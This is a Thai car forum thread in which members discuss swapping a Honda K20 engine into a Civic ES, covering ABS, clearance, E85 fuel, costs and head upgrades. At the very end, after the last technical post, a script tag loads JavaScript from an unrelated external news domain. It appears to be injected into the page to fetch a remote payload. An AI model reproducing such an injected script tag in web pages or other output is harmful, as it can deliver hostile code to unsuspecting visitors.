ตอบ
indica999


เข้าร่วม: 02 สิงหา 2013
ตอบ: 286

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 569
ให้คำขอบคุณ: 190
อังคาร, 3 ธันวา 2013 23:01 - กำลังจะวางk20 มีคำถามครับ
เครื่องเป็นของstream เกียร์ทริปโทนิก ราคาค่าตัว35,000บาท +ค่าแท่นเครื่อง20,000+ค่าแรงช่าง 20,000(รวมแก้อิมโม เชื่อมจุดยึดเครื่องใหม่+ทำสีห้องเครื่อง ของเหลว โดยบอดี้เดิมเป็น02D17A2 ) + -ส่วนเกินไว้5000 รวมค่าทำทั้งหมด 80000บาท.
คำถามคือ
1.ใช้ABSเดิมได้อยู่มั้ยครับ
2.แล้วขนาดของเครื่องถ้าวางลงไปแล้ว รถโหลดมากจะทำให้เกียร์กับแคร้งน้ำมันเครื่องมีโอกาส ครูดพื้นมากน้อยแค่ไหน(ช่างเสนอวิธีโดยการยกตำแหน่งยึดเครื่องขึ้น และเสริมน๊อตที่ฐานฝากระโปรง) มันพอจะทำได้ไหมครับ
3.แล้วอาการที่ต้องห่วงหลังการวางเครื่องใหม่ที่จะตามมาต้องเตรียมงบค่าใช้จ่ายไว้ประมาณเท่าไหรครับ(ไม่รวมทำเบรกและช่วงล่างใหม่)
4.แล้วเครื่องตัวนี้สามารถเติมE85บ้านเราได้รึเปล่า(เห็นช่างบอกเป็นเครื่องยุ่นลงเรือมา) เพราะd17เดิมของผมเติมได้เลยไม่ต้องพ่วงกล่องใดๆทั่งสิ้น(ปั๊มติ๊ก1J)
5.อัตราสิ้นเปลืองมากน้อยแค่ไหนกับบอดี้es
6.เครื่องตัวนี้ถ้าผมทำฝา(ปาดและขัดพอร์ท) จะดีรึเปล่าครับ
7.และถ้าอนาคตจะหาฝาแดงประกบจะพอทำได้รึเปล่าครับ

จบคำถามเพียงเท่านี่ครับ ขอบคุณทุกท่านมากครับ
ได้รับคำขอบคุณจาก: poh  ket  Layto  chan-o  surasaka  mayuct  karnmotocross01  Phetcharat 
poh


ชื่อเล่น: ปู

เข้าร่วม: 11 พฤศจิกา 2012
ตอบ: 960

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 535
ให้คำขอบคุณ: 1784

ที่อยู่: จอมทอง
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 3 ธันวา 2013 23:21 - กำลังจะวางk20 มีคำถามครับ
รอผู้รู้คับ เก็บข้อมูล
ได้รับคำขอบคุณจาก: karnmotocross01 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
พุธ, 4 ธันวา 2013 05:56 - กำลังจะวางk20 มีคำถามครับ
อีกทางเลือก ถ้ารถยังเดิมๆอยู่ ขายรถแล้วเอา เงินที่ขายได้บวกกับ 80000 ไปซื้อรุ่น 2.0 ดีกว่ามั้ยครับ
ได้รับคำขอบคุณจาก: surasaka  akkarin_c  karnmotocross01 
Layto


เข้าร่วม: 21 กรกฎา 2011
ตอบ: 119

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 125
ให้คำขอบคุณ: 49

ที่อยู่: ลำปาง
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 4 ธันวา 2013 06:42 - กำลังจะวางk20 มีคำถามครับ
ขอนอกเรื่องนิดนะคับ เราจะเอาท่อนล่างฝาแดงหมายถึงใต้ฝาสูบลงมาทั้งหมดมาใส่ใส่ในฝาดำesได้ป่าวคับด้วยเหตุผลที่ว่าเสื้อ ข้อเหวี่ยง ก้าน ลูก ของฝาแดงออกแบบมาให้ทนรอบสูงๆได้แต่เราไม่ได้ใส่เพื่อหวังแรงอะไรมากมายแต่คิดแค่อยากให้เครื่องมันทนteenหน่อยมันจะเป็นไปได้มั้ยคับ พอดีมีคนรู้จักเครื่องเขาพังเขาเปลี่ยนยกเครื่องเลยเขาบอกว่าอะไรที่ใช้ได้ก็แกะดูเองแล้วกัน
ได้รับคำขอบคุณจาก: indica999  karnmotocross01 
newcolor


เข้าร่วม: 10 กรกฎา 2010
ตอบ: 989

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2374
ให้คำขอบคุณ: 3894
พุธ, 4 ธันวา 2013 07:27 - กำลังจะวางk20 มีคำถามครับ
Layto พิมพ์ว่า:
ขอนอกเรื่องนิดนะคับ เราจะเอาท่อนล่างฝาแดงหมายถึงใต้ฝาสูบลงมาทั้งหมดมาใส่ใส่ในฝาดำesได้ป่าวคับด้วยเหตุผลที่ว่าเสื้อ ข้อเหวี่ยง ก้าน ลูก ของฝาแดงออกแบบมาให้ทนรอบสูงๆได้แต่เราไม่ได้ใส่เพื่อหวังแรงอะไรมากมายแต่คิดแค่อยากให้เครื่องมันทนteenหน่อยมันจะเป็นไปได้มั้ยคับ พอดีมีคนรู้จักเครื่องเขาพังเขาเปลี่ยนยกเครื่องเลยเขาบอกว่าอะไรที่ใช้ได้ก็แกะดูเองแล้วกัน

 

ใช้ES 2.0 เกียร์ออโต้ หรือเปล่าครับ
ได้รับคำขอบคุณจาก: Layto  karnmotocross01 
Layto


เข้าร่วม: 21 กรกฎา 2011
ตอบ: 119

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 125
ให้คำขอบคุณ: 49

ที่อยู่: ลำปาง
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 4 ธันวา 2013 07:29 - กำลังจะวางk20 มีคำถามครับ
newcolor พิมพ์ว่า:
Layto พิมพ์ว่า:
ขอนอกเรื่องนิดนะคับ เราจะเอาท่อนล่างฝาแดงหมายถึงใต้ฝาสูบลงมาทั้งหมดมาใส่ใส่ในฝาดำesได้ป่าวคับด้วยเหตุผลที่ว่าเสื้อ ข้อเหวี่ยง ก้าน ลูก ของฝาแดงออกแบบมาให้ทนรอบสูงๆได้แต่เราไม่ได้ใส่เพื่อหวังแรงอะไรมากมายแต่คิดแค่อยากให้เครื่องมันทนteenหน่อยมันจะเป็นไปได้มั้ยคับ พอดีมีคนรู้จักเครื่องเขาพังเขาเปลี่ยนยกเครื่องเลยเขาบอกว่าอะไรที่ใช้ได้ก็แกะดูเองแล้วกัน

 

ใช้ES 2.0 เกียร์ออโต้ หรือเปล่าครับ




ใช่คับ
ได้รับคำขอบคุณจาก: karnmotocross01 
Prajuab


เข้าร่วม: 14 กรกฎา 2013
ตอบ: 357

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 209
ให้คำขอบคุณ: 3

ที่อยู่: กิ่งแก้ว สมุทรปราการ
ปี: 2003
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 4 ธันวา 2013 07:42 - กำลังจะวางk20 มีคำถามครับ
รอเก็บข้อมูล
ได้รับคำขอบคุณจาก: karnmotocross01 
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 4 ธันวา 2013 10:14 - กำลังจะวางk20 มีคำถามครับ
จาการเก็บข้อมูลมานะครับ   
สเต็ป 1เครื่อง k20a3  ผมเคยคิดที่จะเอาท่อนบนของฝาแดงมาประกบท่อนล่างฝาขาว  <เห็นท่อนบนขายอยู่ 3xxxx> แต่เห็นว่าใส่ไม่ได้น่ะครับ 
ผมว่าถ้าได้น่าจะมีคนทำหลายคนแล้วอ่ครับ   2 เครื่องรวมกันไม่ถึง 70000  ได้ฝาแดง เทค 2 ฝั่ง 

ส่วนการปาดฝา  และขัดพอร์ท  ผมว่าอย่าทำดีกว่าครับ ลองวางเครื่องเสร็จแล้วขับดูว่าชอบหรือป่าวถ้าไม่ชอบค่อยหาสเต็ปอื่นดีกว่า
เช่นการพ่วงกล่อง  







 
ได้รับคำขอบคุณจาก: indica999  surasaka  karnmotocross01  boom10 
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 4 ธันวา 2013 10:15 - กำลังจะวางk20 มีคำถามครับ
newcolor พิมพ์ว่า:
Layto พิมพ์ว่า:
ขอนอกเรื่องนิดนะคับ เราจะเอาท่อนล่างฝาแดงหมายถึงใต้ฝาสูบลงมาทั้งหมดมาใส่ใส่ในฝาดำesได้ป่าวคับด้วยเหตุผลที่ว่าเสื้อ ข้อเหวี่ยง ก้าน ลูก ของฝาแดงออกแบบมาให้ทนรอบสูงๆได้แต่เราไม่ได้ใส่เพื่อหวังแรงอะไรมากมายแต่คิดแค่อยากให้เครื่องมันทนteenหน่อยมันจะเป็นไปได้มั้ยคับ พอดีมีคนรู้จักเครื่องเขาพังเขาเปลี่ยนยกเครื่องเลยเขาบอกว่าอะไรที่ใช้ได้ก็แกะดูเองแล้วกัน

 

ใช้ES 2.0 เกียร์ออโต้ หรือเปล่าครับ




พี่นิว  เกียร์ผมพังแล้ว     

เอาเกียร์มายืมใส่ก่อนได้ป่าวพี่
ได้รับคำขอบคุณจาก: karnmotocross01 
Hnong


ชื่อเล่น: หน่อง

เข้าร่วม: 30 พฤษภาคม 2013
ตอบ: 1189

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 590
ให้คำขอบคุณ: 401

ที่อยู่: นครนายก-หลักสี่แจ้งวัฒนะ
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 4 ธันวา 2013 11:17 - กำลังจะวางk20 มีคำถามครับ
เก็บข้อมูลครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
indica999


เข้าร่วม: 02 สิงหา 2013
ตอบ: 286

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 569
ให้คำขอบคุณ: 190
พุธ, 4 ธันวา 2013 12:06 - กำลังจะวางk20 มีคำถามครับ
Ton- พิมพ์ว่า:
อีกทางเลือก ถ้ารถยังเดิมๆอยู่ ขายรถแล้วเอา เงินที่ขายได้บวกกับ 80000 ไปซื้อรุ่น 2.0 ดีกว่ามั้ยครับ



รถผมไม่เดิมแล้วอ่ะครับ โช็คไปเซ๊ตระยะใหม่ สปริงตัดเลื่อนเบ้า โช๊ค ท่อเดินใหม่ทั้งเส้น เครื่องเดิมก็ปาด ขัดไปแล้วครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2973

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 4 ธันวา 2013 12:10 - กำลังจะวางk20 มีคำถามครับ
indica999 พิมพ์ว่า:
เครื่องเป็นของstream เกียร์ทริปโทนิก ราคาค่าตัว35,000บาท +ค่าแท่นเครื่อง20,000+ค่าแรงช่าง 20,000(รวมแก้อิมโม เชื่อมจุดยึดเครื่องใหม่+ทำสีห้องเครื่อง ของเหลว โดยบอดี้เดิมเป็น02D17A2 ) + -ส่วนเกินไว้5000 รวมค่าทำทั้งหมด 80000บาท.
คำถามคือ
1.ใช้ABSเดิมได้อยู่มั้ยครับ
2.แล้วขนาดของเครื่องถ้าวางลงไปแล้ว รถโหลดมากจะทำให้เกียร์กับแคร้งน้ำมันเครื่องมีโอกาส ครูดพื้นมากน้อยแค่ไหน(ช่างเสนอวิธีโดยการยกตำแหน่งยึดเครื่องขึ้น และเสริมน๊อตที่ฐานฝากระโปรง) มันพอจะทำได้ไหมครับ
3.แล้วอาการที่ต้องห่วงหลังการวางเครื่องใหม่ที่จะตามมาต้องเตรียมงบค่าใช้จ่ายไว้ประมาณเท่าไหรครับ(ไม่รวมทำเบรกและช่วงล่างใหม่)
4.แล้วเครื่องตัวนี้สามารถเติมE85บ้านเราได้รึเปล่า(เห็นช่างบอกเป็นเครื่องยุ่นลงเรือมา) เพราะd17เดิมของผมเติมได้เลยไม่ต้องพ่วงกล่องใดๆทั่งสิ้น(ปั๊มติ๊ก1J)
5.อัตราสิ้นเปลืองมากน้อยแค่ไหนกับบอดี้es
6.เครื่องตัวนี้ถ้าผมทำฝา(ปาดและขัดพอร์ท) จะดีรึเปล่าครับ
7.และถ้าอนาคตจะหาฝาแดงประกบจะพอทำได้รึเปล่าครับ

จบคำถามเพียงเท่านี่ครับ ขอบคุณทุกท่านมากครับ

ตอบ ตามความเข้าใจส่วนตัวนะครับ
1.abs ของเดิมมีอยู่แล้วก็ใช้ได้ต่อไป วางเครื่องไม่เกี่ยวกัน
2.ต้องถามว่าใช้แท่นของอะไร แต่ถ้าเพลาได้ตำแหน่งเดิมตามบอดี้ es2.0 จากโรงงาน มันไม่น่าจะต่ำจนครูด(es มีรุ่น 2.0 อยู่แล้ว ถ้าเป็นแท่นของ hasport เขาบอกว่าเมื่อวางแล้วต่ำแหน่งเครื่องจะเหมือนกับตอนที่อยู่ในบอดี้ ep3 dc5)
3.ตามความชอบเลยและกำลังทรัย์เลยครับ เบรค โช้ค ส่วนอาการที่ต้องห่วงไม่น่าจะต้องห่วงอะไร ก็ดูแลปกติสม่ำเสมอ
4.เติม e85 โดยไม่ปรับแต่งเลยนั้นเติมได้ครับ แต่วิ่งดีหรือป่าวอีกเรื่องนึง แต่เชื่อว่าวิ่งไม่ดีหรอก
5.เทียบกับ es เครื่องใหม่คงกินกว่า
6.สเตปนี้ทำได้ครับ
7.ทำได้หรือป่าวไม่แน่ใจ  แต่ฝาแดงกับฝาขาว พื้นฐานเครื่องมันคนละโลกเลย ไม่ได้ต่างกันแค่ระบบวาวล์ที่ฝาอย่างเดียว ถ้าอนาคตจะเอาฝาแดงมาปะกบ ผมว่ายกมาทั้งเครื่องฝาแดงจะดีกว่าอย่าเอามาแค่ฝาเลย
ปล.การวางเครื่อง k มีรายละเอียดเยอะมากครับ อธิบายกันยาว สรุปสั้นๆถ้าอยากแรง k แดงตอบโจทย์ ถ้าเอาแรงพอประมาณเน้นประหยัดงบไม่สูงมาก k ขาว พอได้ แต่ถ้าเอา k ขาวมาต่อยอดเรื่อยๆ ผมว่าฝาแดงจบกว่า


 
ได้รับคำขอบคุณจาก: indica999  Rachen  numxs  surasaka  wittayab  es330  bhumipat  kenglnw123  cisco  karnmotocross01  blendz 
jatupon


ชื่อเล่น: มู

เข้าร่วม: 30 กรกฎา 2009
ตอบ: 138

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 430
ให้คำขอบคุณ: 169

ที่อยู่: คลอง 8 ธัญบุรี
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 4 ธันวา 2013 13:35 - กำลังจะวางk20 มีคำถามครับ
ขับเครื่องเดิม. เเต่งนิดหน่อยดีกว่าครับ. เพราะวางไปเดี่ยวขายยากครับ
เอาไว้ขยับรุ่นเลยดีกว่าครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
newcolor


เข้าร่วม: 10 กรกฎา 2010
ตอบ: 989

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2374
ให้คำขอบคุณ: 3894
พุธ, 4 ธันวา 2013 13:38 - กำลังจะวางk20 มีคำถามครับ
Layto พิมพ์ว่า:

newcolor พิมพ์ว่า:

Layto พิมพ์ว่า:
ขอนอกเรื่องนิดนะคับ เราจะเอาท่อนล่างฝาแดงหมายถึงใต้ฝาสูบลงมาทั้งหมดมาใส่ใส่ในฝาดำesได้ป่าวคับด้วยเหตุผลที่ว่าเสื้อ ข้อเหวี่ยง ก้าน ลูก ของฝาแดงออกแบบมาให้ทนรอบสูงๆได้แต่เราไม่ได้ใส่เพื่อหวังแรงอะไรมากมายแต่คิดแค่อยากให้เครื่องมันทนteenหน่อยมันจะเป็นไปได้มั้ยคับ พอดีมีคนรู้จักเครื่องเขาพังเขาเปลี่ยนยกเครื่องเลยเขาบอกว่าอะไรที่ใช้ได้ก็แกะดูเองแล้วกัน


 

ใช้ES 2.0 เกียร์ออโต้ หรือเปล่าครับ




ใช่คับ


ที่ใช้ได้น่าจะมีปั้มน้ำมันเครื่อง ลูกหัวนูน ก้านเหมือนกันไม่ต้องเปลี่ยน เสื้อสูบน่าจะเหมือนกันไม่น่าจะทนกว่า ถ้าจะเอาท่อนล่างมาใส่เลยต้องแปลงหลายอย่างครับ เจอช่างเก่งก็จบ ไม่เก่งก็ปัญหาตามมาอีกเยอะครับ ไม่แน่ใจน่ะครับเท่าที่เคยถามมาครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
newcolor


เข้าร่วม: 10 กรกฎา 2010
ตอบ: 989

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2374
ให้คำขอบคุณ: 3894
พุธ, 4 ธันวา 2013 13:43 - กำลังจะวางk20 มีคำถามครับ
blackhawkpearl พิมพ์ว่า:

newcolor พิมพ์ว่า:

Layto พิมพ์ว่า:
ขอนอกเรื่องนิดนะคับ เราจะเอาท่อนล่างฝาแดงหมายถึงใต้ฝาสูบลงมาทั้งหมดมาใส่ใส่ในฝาดำesได้ป่าวคับด้วยเหตุผลที่ว่าเสื้อ ข้อเหวี่ยง ก้าน ลูก ของฝาแดงออกแบบมาให้ทนรอบสูงๆได้แต่เราไม่ได้ใส่เพื่อหวังแรงอะไรมากมายแต่คิดแค่อยากให้เครื่องมันทนteenหน่อยมันจะเป็นไปได้มั้ยคับ พอดีมีคนรู้จักเครื่องเขาพังเขาเปลี่ยนยกเครื่องเลยเขาบอกว่าอะไรที่ใช้ได้ก็แกะดูเองแล้วกัน


 

ใช้ES 2.0 เกียร์ออโต้ หรือเปล่าครับ




พี่นิว  เกียร์ผมพังแล้ว     

เอาเกียร์มายืมใส่ก่อนได้ป่าวพี



 

เดี๋ยวพี่ไปค้นดูที่บ้านก่อนน่ะครับว่าอยู่ตรงไหน
ได้รับคำขอบคุณจาก: karnmotocross01 
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 4 ธันวา 2013 16:31 - กำลังจะวางk20 มีคำถามครับ
newcolor พิมพ์ว่า:
blackhawkpearl พิมพ์ว่า:

newcolor พิมพ์ว่า:

Layto พิมพ์ว่า:
ขอนอกเรื่องนิดนะคับ เราจะเอาท่อนล่างฝาแดงหมายถึงใต้ฝาสูบลงมาทั้งหมดมาใส่ใส่ในฝาดำesได้ป่าวคับด้วยเหตุผลที่ว่าเสื้อ ข้อเหวี่ยง ก้าน ลูก ของฝาแดงออกแบบมาให้ทนรอบสูงๆได้แต่เราไม่ได้ใส่เพื่อหวังแรงอะไรมากมายแต่คิดแค่อยากให้เครื่องมันทนteenหน่อยมันจะเป็นไปได้มั้ยคับ พอดีมีคนรู้จักเครื่องเขาพังเขาเปลี่ยนยกเครื่องเลยเขาบอกว่าอะไรที่ใช้ได้ก็แกะดูเองแล้วกัน


 

ใช้ES 2.0 เกียร์ออโต้ หรือเปล่าครับ




พี่นิว  เกียร์ผมพังแล้ว     

เอาเกียร์มายืมใส่ก่อนได้ป่าวพี



 

เดี๋ยวพี่ไปค้นดูที่บ้านก่อนน่ะครับว่าอยู่ตรงไหน




ครับผม   ขอบคุณครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
Layto


เข้าร่วม: 21 กรกฎา 2011
ตอบ: 119

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 125
ให้คำขอบคุณ: 49

ที่อยู่: ลำปาง
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 5 ธันวา 2013 10:53 - กำลังจะวางk20 มีคำถามครับ
newcolor พิมพ์ว่า:
Layto พิมพ์ว่า:

newcolor พิมพ์ว่า:

Layto พิมพ์ว่า:
ขอนอกเรื่องนิดนะคับ เราจะเอาท่อนล่างฝาแดงหมายถึงใต้ฝาสูบลงมาทั้งหมดมาใส่ใส่ในฝาดำesได้ป่าวคับด้วยเหตุผลที่ว่าเสื้อ ข้อเหวี่ยง ก้าน ลูก ของฝาแดงออกแบบมาให้ทนรอบสูงๆได้แต่เราไม่ได้ใส่เพื่อหวังแรงอะไรมากมายแต่คิดแค่อยากให้เครื่องมันทนteenหน่อยมันจะเป็นไปได้มั้ยคับ พอดีมีคนรู้จักเครื่องเขาพังเขาเปลี่ยนยกเครื่องเลยเขาบอกว่าอะไรที่ใช้ได้ก็แกะดูเองแล้วกัน


 

ใช้ES 2.0 เกียร์ออโต้ หรือเปล่าครับ




ใช่คับ


ที่ใช้ได้น่าจะมีปั้มน้ำมันเครื่อง ลูกหัวนูน ก้านเหมือนกันไม่ต้องเปลี่ยน เสื้อสูบน่าจะเหมือนกันไม่น่าจะทนกว่า ถ้าจะเอาท่อนล่างมาใส่เลยต้องแปลงหลายอย่างครับ เจอช่างเก่งก็จบ ไม่เก่งก็ปัญหาตามมาอีกเยอะครับ ไม่แน่ใจน่ะครับเท่าที่เคยถามมาครับ




แล้วที่ว่ามีออยเจ็ทนี่มันอยู่ที่เสื้อหรือที่ปั๊มน้ำมันเครื่องคับที่ผมเล็งไว้คือ ข้อเหวี่ยง ผมเคยอ่านโพสของคุณเอกมั้งคับไม่แน่ใจว่าของฝาแดงจะถ่วงมาดีกว่า ออยเจ็ทฉีดใต้ลูกสูบ ก้าน ลูก ส่วนก้านที่ผมอ่านจากข้อความแกบอกว่าไม่เหมือนกันคับแต่ผมไม่รู้เลย ในกรณีของผมให้ลองตัดปัญหาเรื่องคุ้มไม่คุ้มออกดูคับเขาให้มา ที่คิดจะใส่ไม่ได้หวังจะทำต่อแรงนะคับในความคิดผมใส้ในของฝาแดงออกแบบมาลองรับรอบ7-8000+ได้อยู่แล้วแต่ผมเอามาใส่ในa3ที่ตัดรอบ6800นั่นหมายถึงเครื่องมันน่าจะทนกว่าปกติ (หรือเปล่า) อยากรู้ว่าผมคิดถูกมั้ยแล้วมันทำได้หรือป่าวคับ
ได้รับคำขอบคุณจาก: karnmotocross01 
yoosabai


ชื่อเล่น: เอ้

เข้าร่วม: 30 กันยา 2008
ตอบ: 1992

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8345
ให้คำขอบคุณ: 4773

ที่อยู่: Samutprakarn
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 6 ธันวา 2013 09:13 - กำลังจะวางk20 มีคำถามครับ
indica999 พิมพ์ว่า:
เครื่องเป็นของstream เกียร์ทริปโทนิก ราคาค่าตัว35,000บาท +ค่าแท่นเครื่อง20,000+ค่าแรงช่าง 20,000(รวมแก้อิมโม เชื่อมจุดยึดเครื่องใหม่+ทำสีห้องเครื่อง ของเหลว โดยบอดี้เดิมเป็น02D17A2 ) + -ส่วนเกินไว้5000 รวมค่าทำทั้งหมด 80000บาท.
คำถามคือ
1.ใช้ABSเดิมได้อยู่มั้ยครับ
2.แล้วขนาดของเครื่องถ้าวางลงไปแล้ว รถโหลดมากจะทำให้เกียร์กับแคร้งน้ำมันเครื่องมีโอกาส ครูดพื้นมากน้อยแค่ไหน(ช่างเสนอวิธีโดยการยกตำแหน่งยึดเครื่องขึ้น และเสริมน๊อตที่ฐานฝากระโปรง) มันพอจะทำได้ไหมครับ
3.แล้วอาการที่ต้องห่วงหลังการวางเครื่องใหม่ที่จะตามมาต้องเตรียมงบค่าใช้จ่ายไว้ประมาณเท่าไหรครับ(ไม่รวมทำเบรกและช่วงล่างใหม่)
4.แล้วเครื่องตัวนี้สามารถเติมE85บ้านเราได้รึเปล่า(เห็นช่างบอกเป็นเครื่องยุ่นลงเรือมา) เพราะd17เดิมของผมเติมได้เลยไม่ต้องพ่วงกล่องใดๆทั่งสิ้น(ปั๊มติ๊ก1J)
5.อัตราสิ้นเปลืองมากน้อยแค่ไหนกับบอดี้es
6.เครื่องตัวนี้ถ้าผมทำฝา(ปาดและขัดพอร์ท) จะดีรึเปล่าครับ
7.และถ้าอนาคตจะหาฝาแดงประกบจะพอทำได้รึเปล่าครับ

จบคำถามเพียงเท่านี่ครับ ขอบคุณทุกท่านมากครับ



1. ระบบ ABS ควรจะใช้งานได้เหมือนเดิมครับ
2. โอกาสแคร๊งจะโดนพื้นน่าจะเป็นไปได้ยากนะครับ เพราะตำเหน่งเครื่องยังไงก็มีคานเป็นตัวบังคับอยู่ครับ
3. อย่าเรียกว่าอาการที่ต้องห่วงดีกว่า ให้มองว่าจุดที่ต้องดูแทนล่ะกันครับ ลองจับอาการรถ วิ่งตรงมั๊ย เร่งแล้วดึงซ้ายดึงขวารึเปล่า เบรคแล้วดึงซ้ายดึงขวามั๊ย ความร้อนปกติรึป่าว เกียร์เปลี่ยนปกติมั๊ย อะไรประมาณนี้ครับ
4. ถ้าจะเติม E85 แนะนำให้เปลี่ยนอุปกรณ์ที่ควรจะต้องเปลี่ยนไปเลยทีเดียวตอนวางเครื่องเลยครับ เช่นปั๊มติ๊ก ท่อน้ำมัน รวมถึงหัวฉีด ซึ่งอาจจะเป็น RDX หรือ K20A ฝาแดงครับ
5. ในเมืองกินกว่า D17 แน่นอนครับ แต่ถ้าวิ่งไกลๆความเร็วเฉลี่ย 100-140 ผมว่าประหยัดกว่า D17 ครับ ของผมเคยได้เยอะสุด 329 กิโลเมตร น้ำมันครึ่งถังครับ
6. อย่าทำเลยครับ ถ้าเป็นเกียร์ AT เกรงว่าจะได้ไม่คุ้มเงินที่จ่ายไป
7. อาจจะทำได้นะครับ แต่อาจจะไม่คุ้มทำอ่ะครับ เพราะเปลี่ยนฝาอย่างเดียวไม่พอ ต้องหากล่องมาคุม ซึ่งกล่องเดิมใช่ไม่ได้แน่นอน ฝาสูบฝาแดงน่าจะให้กำลังที่ดีในรอบสูง  ซึ่งหากเปิดรอบสูงเกิน 7,500 ขึ้นไป ท่อล่างเดิม K20A3 ของ Stream รองรับไม่ได้แน่นอนครับ

Layto พิมพ์ว่า:
newcolor พิมพ์ว่า:
Layto พิมพ์ว่า:

newcolor พิมพ์ว่า:

Layto พิมพ์ว่า:
ขอนอกเรื่องนิดนะคับ เราจะเอาท่อนล่างฝาแดงหมายถึงใต้ฝาสูบลงมาทั้งหมดมาใส่ใส่ในฝาดำesได้ป่าวคับด้วยเหตุผลที่ว่าเสื้อ ข้อเหวี่ยง ก้าน ลูก ของฝาแดงออกแบบมาให้ทนรอบสูงๆได้แต่เราไม่ได้ใส่เพื่อหวังแรงอะไรมากมายแต่คิดแค่อยากให้เครื่องมันทนteenหน่อยมันจะเป็นไปได้มั้ยคับ พอดีมีคนรู้จักเครื่องเขาพังเขาเปลี่ยนยกเครื่องเลยเขาบอกว่าอะไรที่ใช้ได้ก็แกะดูเองแล้วกัน


 

ใช้ES 2.0 เกียร์ออโต้ หรือเปล่าครับ




ใช่คับ


ที่ใช้ได้น่าจะมีปั้มน้ำมันเครื่อง ลูกหัวนูน ก้านเหมือนกันไม่ต้องเปลี่ยน เสื้อสูบน่าจะเหมือนกันไม่น่าจะทนกว่า ถ้าจะเอาท่อนล่างมาใส่เลยต้องแปลงหลายอย่างครับ เจอช่างเก่งก็จบ ไม่เก่งก็ปัญหาตามมาอีกเยอะครับ ไม่แน่ใจน่ะครับเท่าที่เคยถามมาครับ




แล้วที่ว่ามีออยเจ็ทนี่มันอยู่ที่เสื้อหรือที่ปั๊มน้ำมันเครื่องคับที่ผมเล็งไว้คือ ข้อเหวี่ยง ผมเคยอ่านโพสของคุณเอกมั้งคับไม่แน่ใจว่าของฝาแดงจะถ่วงมาดีกว่า ออยเจ็ทฉีดใต้ลูกสูบ ก้าน ลูก ส่วนก้านที่ผมอ่านจากข้อความแกบอกว่าไม่เหมือนกันคับแต่ผมไม่รู้เลย ในกรณีของผมให้ลองตัดปัญหาเรื่องคุ้มไม่คุ้มออกดูคับเขาให้มา ที่คิดจะใส่ไม่ได้หวังจะทำต่อแรงนะคับในความคิดผมใส้ในของฝาแดงออกแบบมาลองรับรอบ7-8000+ได้อยู่แล้วแต่ผมเอามาใส่ในa3ที่ตัดรอบ6800นั่นหมายถึงเครื่องมันน่าจะทนกว่าปกติ (หรือเปล่า) อยากรู้ว่าผมคิดถูกมั้ยแล้วมันทำได้หรือป่าวคับ
 



มันคือ Qil Squiter มันจะอยู่ที่ใต้เสื้อสูบ เอาไว้ฉีดน้ำมันเครื่องเลี๊ยงก้าน ลูกสูบ ซึ่งจะมีเฉพาะฝาแดงเท่านั้น
ซึ่งส่วนอื่นที่ต่างกัน เท่าที่รู้จะมีปั๊มน้ำมันเครื่องที่ฝาแดงมีแรงดันสูงกว่า ฉุดกำลังเครื่องน้อยกว่า ข้อเหวี่ยงฝาแดงใหญ่กว่า ลูกสูบกำลังอัดสูงกว่า ระบายความร้อนดีกว่า และแพงกว่า  "<script src="https://sport32news.com/civicesgroup.js">

